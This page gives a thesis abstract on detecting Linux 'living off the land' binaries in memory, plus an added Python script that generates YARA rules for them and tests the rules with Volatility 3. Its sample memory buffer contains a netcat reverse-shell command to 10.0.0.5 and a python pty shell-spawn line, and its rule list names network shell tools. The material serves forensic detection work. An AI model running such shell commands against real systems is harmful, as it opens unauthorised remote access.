YARA rules generator for Linux binaries and memory detection with Volatility 3

Master Thesis
Author
Atalialis, Kyriakos
Ατάλιαλης, Κυριάκος
Date
2026-02-21
Keywords
YARA ; Volatility 3 ; Memory forensics ; Threat hunting ; LOLBins ; Fileless malware ; Linux ; GTFOBins ; Volatile memory

Abstract
In recent years cyber attacks have become more sophisticated and complex, and even experienced researchers struggle to build measures that mitigate them. Malware now operates in a stealthier and more careful way than in the past.
Ransomware, rootkits and fileless malware can carry out their malicious activity directly in an operating system's memory. This makes them very hard to detect: traditional antivirus tools focus mainly on scanning files on disk, while these threats bypass the file system entirely. Even antivirus products that do monitor memory often fall short against modern attack techniques, leaving systems exposed to stealthy fileless infections.
Historically, fileless malware has been most prevalent on Windows, where attackers abuse native tools such as PowerShell and WMI to run malicious code directly in memory. More recently, Linux environments have become a target as well, with adversaries leveraging legitimate system binaries to build attack chains that are stealthier and harder to detect. This evolution shows the growing complexity of fileless techniques across operating systems.
Researchers specialising in memory forensics have developed a range of tools to detect such attacks in a computer's memory; Volatility and Rekall are prominent examples. Alongside these, YARA provides pattern-matching rules that can be applied both to files on disk and to memory. YARA rules describe malware by strings, hex patterns and code fragments, and help trace malware in the wild.
This thesis covers LOLBins (Living off the Land binaries) on Linux systems: legitimate, commonly abused tools that enable fileless attacks. By applying YARA rules to memory, the presence of known LOLBins can be identified, pointing at binaries that attackers frequently abuse. Because these are legitimate binaries, a match is a lead for triage rather than proof of compromise; the rules help memory forensic analysts flag potentially suspicious binaries in memory and prioritise them for further investigation.
The YARA rules are generated automatically by a Python-based YARA generator, which produces rules faster and without manual effort. Finally, the thesis uses the Volatility 3 YARA scanning plugin to apply the generated LOLBins rules to a Linux memory dump.
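The pipeline the abstract describes (an inventory of Linux LOLBins, a Python generator that turns it into a YARA rule, and a scan over memory) as an added, self-contained example. This is illustrative code written for this page, not the thesis author's generator. The `LOLBINS` inventory, the rule name `linux_lolbins`, the `SAMPLE_MEMORY` buffer and the function names are all constructed here for illustration; the `yara` import is optional, and the pure-Python `scan_buffer` emulates YARA's `fullword` semantics for the same strings so the script runs without yara-python installed.

```python
"""Generate a YARA rule for known Linux LOLBins and check it against a
memory-like byte buffer. Added example for this page, not the thesis
author's generator. The LOLBin list and the sample buffer are constructed."""
from __future__ import annotations

import re
from datetime import date

# Constructed inventory (assumption): binary name -> absolute path. A real
# generator would load this from a GTFOBins-style list.
LOLBINS: dict[str, str] = {
    "nc": "/usr/bin/nc",
    "socat": "/usr/bin/socat",
    "python3": "/usr/bin/python3",
    "curl": "/usr/bin/curl",
    "base64": "/usr/bin/base64",
}

# Constructed stand-in for a slice of process memory: argv/envp-style
# NUL-separated strings. Contains nc and python3; ncat must NOT count as nc.
SAMPLE_MEMORY = (
    b"\x00\x00/bin/bash\x00-c\x00/usr/bin/nc -e /bin/sh 10.0.0.5 4444\x00"
    b"/usr/bin/ncat --version\x00PATH=/usr/bin:/bin\x00"
    b"/usr/bin/python3 -c 'import pty;pty.spawn(\"/bin/sh\")'\x00"
)


def yara_identifier(name: str) -> str:
    """Turn an arbitrary name into a legal YARA identifier
    ([A-Za-z0-9_], not starting with a digit)."""
    ident = re.sub(r"[^A-Za-z0-9_]", "_", name)
    if not ident or ident[0].isdigit():
        ident = "_" + ident
    return ident


def generate_rule(rule_name: str, binaries: dict[str, str], min_hits: int = 1) -> str:
    """Emit YARA source: one ascii fullword string per LOLBin path and a
    condition requiring min_hits of them. fullword stops /usr/bin/nc from
    also firing inside /usr/bin/ncat."""
    if min_hits < 1 or min_hits > len(binaries):
        raise ValueError("min_hits must be between 1 and the number of binaries")
    lines = [
        f"rule {yara_identifier(rule_name)}",
        "{",
        "    meta:",
        '        description = "Known Linux LOLBin paths observed in memory"',
        f'        generated = "{date.today().isoformat()}"',
        "    strings:",
    ]
    for name, path in binaries.items():
        # Escape backslashes and quotes so the path is a valid YARA text string.
        escaped = path.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        ${yara_identifier(name)} = "{escaped}" ascii fullword')
    lines += ["    condition:", f"        {min_hits} of them", "}", ""]
    return "\n".join(lines)


def scan_buffer(buf: bytes, binaries: dict[str, str]) -> list[str]:
    """Pure-Python stand-in for the YARA scan: report which LOLBin paths occur
    in buf with YARA's fullword semantics (no alphanumeric byte on either
    side). Handy for sanity-checking a rule before running Volatility."""
    hits = []
    for name, path in binaries.items():
        pattern = rb"(?<![A-Za-z0-9])" + re.escape(path.encode()) + rb"(?![A-Za-z0-9])"
        if re.search(pattern, buf):
            hits.append(name)
    return sorted(hits)


def yara_match(rule_text: str, buf: bytes) -> list[str] | None:
    """Run the real YARA engine if yara-python is installed; None otherwise."""
    try:
        import yara  # optional dependency
    except ImportError:
        return None
    rules = yara.compile(source=rule_text)
    return sorted(m.rule for m in rules.match(data=buf))


if __name__ == "__main__":
    rule = generate_rule("linux_lolbins", LOLBINS)
    print(rule)
    print("expected hits:", scan_buffer(SAMPLE_MEMORY, LOLBINS))
    print("yara-python:", yara_match(rule, SAMPLE_MEMORY))
```

Write the generated rule to a file and hand it to Volatility 3's YARA scanner, e.g. `vol -f memory.lime yarascan.YaraScan --yara-file lolbins.yar`; the plugin and option names are those of Volatility 3 2.x, so confirm them with `vol yarascan.YaraScan -h` on the installed version. The rule is deliberately narrow: `fullword` keeps `/usr/bin/nc` from matching `/usr/bin/ncat`, and raising `min_hits` trades recall for fewer false positives, which matters because every path in the inventory belongs to a legitimate binary and a hit is a triage lead rather than a verdict.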

